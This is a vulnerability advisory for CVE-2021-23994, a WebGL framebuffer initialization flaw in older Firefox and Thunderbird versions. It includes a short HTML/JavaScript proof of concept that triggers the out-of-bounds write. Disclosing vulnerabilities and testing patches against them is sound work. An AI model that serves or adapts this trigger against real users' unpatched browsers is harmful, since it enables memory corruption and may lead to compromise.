CVE-2021-23994
HIGH Severity
A WebGL framebuffer was not initialized early enough, resulting in memory corruption and an out-of-bounds write. This vulnerability affects Firefox ESR < 78.10, Thunderbird < 78.10, and Firefox < 88.
Proof of Concept
<!DOCTYPE html>
<html>
<body>
<canvas id="canvas3" width="1024" height="1024"></canvas>
<script>
var canvas = document.getElementById('canvas3');
var gl3 = canvas.getContext('webgl2', { alpha: false, antialias: false });
var fBuffer3 = gl3.createFramebuffer();
gl3.bindFramebuffer(gl3.DRAW_FRAMEBUFFER, fBuffer3);
var fBuffer4 = gl3.createFramebuffer();
gl3.bindFramebuffer(gl3.READ_FRAMEBUFFER, fBuffer4);
var rBuffer3 = gl3.createRenderbuffer();
gl3.bindRenderbuffer( gl3.RENDERBUFFER, rBuffer3 );
gl3.framebufferRenderbuffer( gl3.READ_FRAMEBUFFER, gl3.COLOR_ATTACHMENT0, gl3.RENDERBUFFER, rBuffer3 );
gl3.deleteFramebuffer(fBuffer4);
gl3.drawBuffers([gl3.COLOR_ATTACHMENT0]);
</script>
</body>
</html>
Risk Information
CVE ID: CVE-2021-23994
Vendor: Mozilla
Product: Firefox
CVSS Score: 8.8
Advisories
Vendor Advisory
NVD